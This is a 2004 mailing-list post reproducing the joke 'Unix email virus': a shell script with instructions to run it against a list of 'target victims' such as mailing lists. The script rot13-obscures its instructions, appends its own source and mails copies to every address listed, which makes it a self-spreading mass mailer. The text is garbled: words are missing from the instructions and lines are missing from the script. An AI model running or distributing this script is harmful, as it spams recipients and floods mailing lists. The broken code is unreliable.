[ale] Virus, please run.
Ronald Chmara
ron at Opus1.COM
Thu Apr 8 01:02:40 EDT 2004
Congratulations, you are now the proud recipient of a Unix email virus.
Now, you no longer have to feel left out from the crowd of Windows
who, it seems, get to have all of the fun.
However, becoming infected by this virus will take a little more effort
your part, mostly because most Unix operating systems seem to actually
concerned with security. Also, since you have a diverse range of mail
clients you could be running (none of which, as far as I know, could
automatically execute this virus), I will need a little bit of help from
you. Please follow these steps to activate the virus on your machine.
1. Save this message to a file "/tmp/virus.sh".
2. Use a text editor to remove the mail header (above the first "cut
there is no need to edit away the bottom of the file.
3. Create a file (say "/tmp/addresses") with a list of email addresses
target victims, one per line. For best results, these should
mailing lists, and automatic replay addresses.
4. Execute: "sh /tmp/virus.sh /tmp/addresses"
This version of this virus does not need to be run as root.
----8<--------8<--------8<---- cut here ----8<--------8<--------8<----
#! /bin/sh
# Unix, email virus.
# Usage:
# sh virus.sh address-list
# where address-list is a list of email addresses to send the virus to.
# Revision History:
# Version 1.0 - simplistic creation of messages.
# Version 1.1 - Rot13 the starting text.
# - Read addresses in script, so there can be more than 4K of addresses.
# - Detect which mailer to use.
# - Obscure the source to make it hard to follow.
# - Forge mail, instead of just sending it (for a more realistic feel).
# BTW: In case you don't get it, here's this smliey :-)
# in case you really don't get it, this is a joke. If you really follow
# the steps below, you have no right to complain that the script did
# exactly what you told it to.
tr a-zA-Z n-za-mN-ZA-M >$vname <<'EOF'
Pbatenghyngvbaf, lbh ner abj gur cebhq erpvcvrag bs n Havk rznvy ivehf.
Abj, lbh ab ybatre unir gb srry yrsg bhg sebz gur pebjq bs Jvaqbjf
jub, vg frrzf, trg gb unir nyy bs gur sha.
Ubjrire, orpbzvat vasrpgrq ol guvf ivehf jvyy gnxr n yvggyr zber rssbeg
lbhe cneg, zbfgyl orpnhfr zbfg Havk bcrengvat flfgrzf frrz gb npghnyyl
pbaprearq jvgu frphevgl. Nyfb, fvapr lbh unir n qvirefr enatr bs znvy
pyvragf lbh pbhyq or ehaavat (abar bs juvpu, nf sne nf V xabj, pbhyq
nhgbzngvpnyyl rkrphgr guvf ivehf), V jvyy arrq n yvggyr ovg bs uryc sebz
lbh. Cyrnfr sbyybj gurfr fgrcf gb npgvingr gur ivehf ba lbhe znpuvar.
1. Fnir guvf zrffntr gb n svyr "/gzc/ivehf.fu".
2. Hfr n grkg rqvgbe gb erzbir gur znvy urnqre (nobir gur svefg "phg
gurer vf ab arrq gb rqvg njnl gur obggbz bs gur svyr.
3. Perngr n svyr (fnl "/gzc/nqqerffrf") jvgu n yvfg bs rznvy nqqerffrf
gnetrg ivpgvzf, bar cre yvar. Sbe orfg erfhygf, gurfr fubhyq
znvyvat yvfgf, naq nhgbzngvp ercynl nqqerffrf.
4. Rkrphgr: "fu /gzc/ivehf.fu /gzc/nqqerffrf"
Guvf irefvba bs guvf ivehf qbrf abg arrq gb or eha nf ebbg.
b1='t her'
echo $border$border$border cu${b1}e $border$border$border >> $vname
cat $0 >> $vname
for i in `cat $1`; do
Mail -s 'Unix Virus' $i < $vname
rm $vname
exit 0
# End of script.
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